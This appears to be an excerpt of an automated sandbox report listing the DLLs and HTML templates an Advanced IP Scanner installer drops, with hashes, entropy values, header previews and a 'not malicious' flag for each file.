C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.936138213943514
Encrypted:	false
SSDEEP:	384:wdv3V0dfpkXc0vVafW2hWqSUA0GftpBjjQjclvQyURz82u6:wdv3VqpkXc0vVaBziRvU22u6
MD5:	88C4CA509C947509E123F22E5F077639
SHA1:	AE837C556FF23B9E166288A11E409D21BDDDA4ED
SHA-256:	0787FD3D9606B8614F9073C5F04CC6CB153BBF2992297CEBB8C537C066A78C9F
SHA-512:	3CCE8C4EA63019ADC6383D5DA7F5969B0B10A55CEEF29083E21F04D23377305325C5CB5F4656955F8ABB5A1E10BEEAC60808DE9D03A72462950469AE49768418
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......a.....@.............................V............ ...................<..............8............................................................................text...f........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.030340698171656
Encrypted:	false
SSDEEP:	384:/tZ34W2hWlgbCA0GftpBjx5C32lI663UG:w18i+66kG
MD5:	F6B4D8D403D22EB87A60BF6E4A3E7041
SHA1:	B51A63F258B57527549D5331C405EACC77969433
SHA-256:	25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270
SHA-512:	1ACD8F7BC5D3AE1DB46824B3A5548B33E56C9BAC81DCD2E7D90FDBD1D3DD76F93CDF4D52A5F316728F92E623F73BC2CCD0BC505A259DFF20C1A5A2EB2F12E41B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................v............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.960490184684636
Encrypted:	false
SSDEEP:	192:nvj+UKIMFsWVghW/AvSx9YOCAs/nGfe4pBjSf3Ir9WNArXVWQ4mWSEqnajMHxxBB:7+UhW2hWISUA0GftpBjdrZolI663UU
MD5:	B9EA058418BE64F85B0FF62341F7099E
SHA1:	0B37E86267D0C6782E18F734B710817B8B03DA76
SHA-256:	653BE79FA676D052CCE60D743282018FAAAF22E15A3CB8F1EEE01F243D56B431
SHA-512:	EFAAC54C0C6648F666B58E0441315446FDBCB8544C3B9E2005482DE25E62E716D0C66DCB7A9CEDD7967FFC26E394AE9F1B1DFDCE1D4243CFDE737140D1C3D51D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................E............ ...................<..............8............................................................................text...U........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.0606914357897885
Encrypted:	false
SSDEEP:	192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
MD5:	A20084F41B3F1C549D6625C790B72268
SHA1:	E3669B8D89402A047BFBF9775D18438B0D95437E
SHA-256:	0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
SHA-512:	DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.97908669425612
Encrypted:	false
SSDEEP:	192:MGMWVghW/AvSx9YOCAs/nGfe4pBjSf6qy4X3WNArXVWQ4mWwiS21qnaj9RlS6VEX:iW2hWoSUA0GftpBjfHWbziS2lBRAkEX
MD5:	2886C75F8B9D3EFDF315C44B52847AEE
SHA1:	4FC75E39493B356F1F219798E3738DBC764281E4
SHA-256:	3DB27D95689F936B4591EBAD18173AD07FAC07D69D68EEFF06DEE158599D731F
SHA-512:	2931224106EEEA142664AEC9D1D5D028D15A14765BCE8674D34D67FC027F6FEFF3AF283F3D81B113E6EFCD42E6B4BD249E94E01C8F41B5211650F1775774B765
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......9+....@.............................9............ ...................<..............8............................................................................text...I........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.97635016555389
Encrypted:	false
SSDEEP:	384:UjcW2hWX7QA0GftpBju0dtTxZlBRAk9l3:yAwyi8or1RAO
MD5:	3B038338C1EB179D8EEE3883CF42BC3E
SHA1:	EA97CF2EE16EF2DF3766A40C6CE33C8BE5F683B2
SHA-256:	C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979
SHA-512:	1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......Ts....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22720
Entropy (8bit):	6.8330909328576315
Encrypted:	false
SSDEEP:	192:sYNpdkKBcyNWVghW/77l9YOCAs/nGfe4pBjSfCKZWNArXVWQ4mWuqnajMHxxBNT5:zuyNW2hWD7QA0GftpBjLKNplI663U4v
MD5:	5245F303E96166B8E625DD0A97E2D66A
SHA1:	1C9ED748763F1FF5B14B8C791A4C29DE753A96AB
SHA-256:	90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5
SHA-512:	AF51F341670F925449E69C4B5F0A82F4FC4EB32913943272C32E3F3F18EE43B4AFB78C0D7D2F965C1ABE6A0F3A368616DD7A4FB74D83D22D1B69B405AEF1E043
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.969708578931716
Encrypted:	false
SSDEEP:	192:sWVghW/cgbXH9YOCAs/nGfe4pBjSf4AKWNArXVWQ4mWvMHqnajMHxxBNT0662ONh:sW2hWUgbCA0GftpBjQGEMHlI663Uh
MD5:	45C54A21261180410091CEFB23F6A5AE
SHA1:	80EEE466D086D30C61EAEFC559D57E5E64F56F61
SHA-256:	2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918
SHA-512:	4962F85C94162FE2E35979FFF4E4B3752F322C61D801419769916F5E3A0E0C406284D95C22709C690212D4572EB688D9311A8F85F17C4F5D1A5A9F00E732808C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@............................."............ ...................<..............8............................................................................text...2........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.979229086130751
Encrypted:	false
SSDEEP:	384:kgq6nWm5C1W2hW7SUA0GftpBjAdlI663Um:k6nWm5CTqij66km
MD5:	AB8734C2328A46E7E9583BEFEB7085A2
SHA1:	B4686F07D1217C77EB013153E6FF55B34BE0AF65
SHA-256:	921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8
SHA-512:	FD7E828F842DEABF2DCDCEA3E947DC3AA909C0B6A35C75FD64EDC63C359AB97020876E6C59AD335A2A166437FA65F57433F86C1C2FE10A34B90D15D8592FE911
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......X....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.948212808065758
Encrypted:	false
SSDEEP:	192:579Y17aFBRAWVghW/FgbXH9YOCAs/nGfe4pBjSfyWNArXVWQ4mWuA3qnaj9RlS6b:OtW2hWdgbCA0GftpBjrpA3lBRAkJ
MD5:	39D81596A7308E978D67AD6FDCCDD331
SHA1:	A0B2D43DD1C27D8244D11495E16D9F4F889E34C4
SHA-256:	3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7
SHA-512:	0EF6578DE4E6BA55EDA64691892D114E154D288C419D05D6CFF0EF4240118C20A4CE7F4174EEC1A33397C6CD0135D13798DC91CC97416351775F9ABF60FCAE76
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......4....@.......................................... ...................<..............8............................................................................text...&........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.02455319040347
Encrypted:	false
SSDEEP:	192:wWVghW/4gbXH9YOCAs/nGfe4pBjSfIMYgWNArXVWQ4mWu5BXqnajL1dHx3tKrSwZ:wW2hWwgbCA0GftpBjRMNBtlXBtFwuWd
MD5:	E70D8FE9D21841202B4FD1CF55D37AC5
SHA1:	FA62FB609D15C8AD3B5A12618BCC50F0D95CDEA3
SHA-256:	E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D
SHA-512:	BD38BDF80DEFD4548580E7973D89ED29E1EDD401F202C367A3BA0020678206DA3ACC9B4436C9A122E4EFC32E80DBB39EB9BF08587E4FEBC8F14EC86A8993BCC8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......./....@.............................e............ ...................<..............8............................................................................text...u........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29376
Entropy (8bit):	6.5989266511221745
Encrypted:	false
SSDEEP:	384:K47isbM4Oe5grykfIgTmLSW2hWPgbCA0GftpBjF17cylBRAkV8:X1Mq5grxfInqH8iBgoRAz
MD5:	D0D380AF839124368A96D6AA82C7C8AE
SHA1:	E2AC42F829085E0E5BEEA29FCFF09E467810A777
SHA-256:	06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5
SHA-512:	DAF3997922E18C0BE088A15209C9F01CC1DDA90972A6AADCF76DE867B85D34483AD5E138E3FA321C7140BF8E455C2B908D0A4DB6A9E35011786398656B886479
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................@...............................P.......,....@..............................+...........@...............6...<..............8............................................................................text....,.......................... ..`.rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26816
Entropy (8bit):	6.632501498817798
Encrypted:	false
SSDEEP:	384:my+Kr6aLPmIHJI6/CpG3t2G3t4odXLhW2hWjgbCA0GftpBjpCjzTZlXBtFwLd:mZKrZPmIHJI6NT8irCXDyx
MD5:	809BC1010EAF714CD095189AF236CE2F
SHA1:	10DBC383F7C49DE17FC50E830E3CB494CC873DD1
SHA-256:	B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E
SHA-512:	F72EC10A0005E7023187EF6CCEDF2AF81D16174E628369FB834AF78E4EF2F3D44BF8B70E9B894ABC6791D7B9720C62C52A697FF0ADE0EDDDCAA52B6F14630D1D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.....$...................@...............................P............@.............................. ...........@...............,...<..............8............................................................................text....".......$.................. ..`.rsrc........@.......(..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73408
Entropy (8bit):	5.811008103709619
Encrypted:	false
SSDEEP:	1536:nt2b2De5c4bFX2Jy2cvxXWpD9d3334BkZnkPgE79g:nw2De5c4bFX2Jy2cvxXWpD9d3334BkZ3
MD5:	1DD5666125B8734E92B1041139FA6C37
SHA1:	22E9566352E77AB15A917B45A86C0DC548431692
SHA-256:	D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3
SHA-512:	420B9184842ECD7969BF75F0D8A62569725624AE413C83EE3B6F26973318B4170287F657F2BE8DD3E7FC71264D69B2203E016D078615AD6E31E65033D5C59654
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................................................................@.............................8................................<..............8............................................................................text...H........................... ..`.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.961849079425489
Encrypted:	false
SSDEEP:	192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
MD5:	8F8A47617DFD829A63E3EC4AFF2718D9
SHA1:	1D7DC26BB9C78C4499514FB3529B3478AECF7340
SHA-256:	6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
SHA-512:	D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23232
Entropy (8bit):	6.854338104703726
Encrypted:	false
SSDEEP:	384:5b7hrKIW2hW6SUA0GftpBjoQt1TlI663UMp:5bNrKcziZzW66kMp
MD5:	AE3FA6BF777B0429B825FB6B028F8A48
SHA1:	B53DBFDB7C8DEAA9A05381F5AC2E596830039838
SHA-256:	66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
SHA-512:	1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@......@.....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24768
Entropy (8bit):	6.784463110154403
Encrypted:	false
SSDEEP:	384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
MD5:	32D7B95B1BCE23DB9FBD0578053BA87F
SHA1:	7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
SHA-256:	104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
SHA-512:	7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......h....@.............................a............0...............$...<..............8............................................................................text...q........................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24768
Entropy (8bit):	6.778007627268145
Encrypted:	false
SSDEEP:	768:J6S5yguNvZ5VQgx3SbwA71IkF+w8iB66kP:Jl5yguNvZ5VQgx3SbwA71Itnb6kP
MD5:	5E72659B38A2977984BBC23ED274F007
SHA1:	EA622D608CC942BDB0FAD118C8060B60B2E985C9
SHA-256:	44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA
SHA-512:	ED3CB656A5F5AEE2CC04DD1F25B1390D52F3E85F0C7742ED0D473A117D2AC49E225A0CB324C31747D221617ABCD6A9200C16DD840284BB29155726A3AA749BB1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...............$...<..............8............................................................................text............................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21184
Entropy (8bit):	6.908629649625132
Encrypted:	false
SSDEEP:	384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
MD5:	1FA7C2B81CDFD7ACE42A2A9A0781C946
SHA1:	F5B7117D18A7335228829447E3ECCC7B806EF478
SHA-256:	CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
SHA-512:	339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.011995208399749
Encrypted:	false
SSDEEP:	192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
MD5:	D6ABF5C056D80592F8E2439E195D61AC
SHA1:	33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
SHA-256:	8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
SHA-512:	6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ar_sa.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1800
Entropy (8bit):	4.977566387382036
Encrypted:	false
SSDEEP:	48:ngn27UxOUZyUejUC3UCJ8UZzoUH0OUvMU70qlUQCU2DYlO:gj7Lfdk3tM/4qyMVO
MD5:	C342B5AAD7F710F39DD20641A1B3DF78
SHA1:	7C3636884EE5A170230CAD8D3B5BB875E59C8DF8
SHA-256:	A550CB4323FFBC96B8BED4E5A8F1A82E0EAAAF2987FF794DB55C7D48FB1CAFDC
SHA-512:	CEC17544EB60EB296A742AF55D010EA5D31D3DC34E9DF809B58EFA074F195FA19032C6190FEBBE801E16BDE7A18C5463E35ADC334F34ABEC7B1DFD1E0632BCF6
Malicious:	false
Preview:	<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>.... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>...... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>........:</b></t

C:\Program Files (x86)\Advanced IP Scanner\details_panel_bg_bg.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	5.128056579045673
Encrypted:	false
SSDEEP:	24:lFojhoCsuSH9AXqJH39/t0Kt5RGDXS9ReEhyv:HuZsRH9AXqJHN/t0U2DYs
MD5:	1C7DAA7B7C3119E37B599739F3372A97
SHA1:	D8E90B30F5D754C8B7623CF6FE3E5D298E620201
SHA-256:	DE38F8530D51823F9DDCB33D410D738513C5E83B7284278507F9FBEA2BF29650
SHA-512:	ED3A0FE123F4488AE9A4547B984CC7A21285D2F9638D9A25B772E853D45A3539B1C847046A85159F54029B572B8D9FCE80A4746C8D13928B9AD998F7D6DF4A1F
Malicious:	false
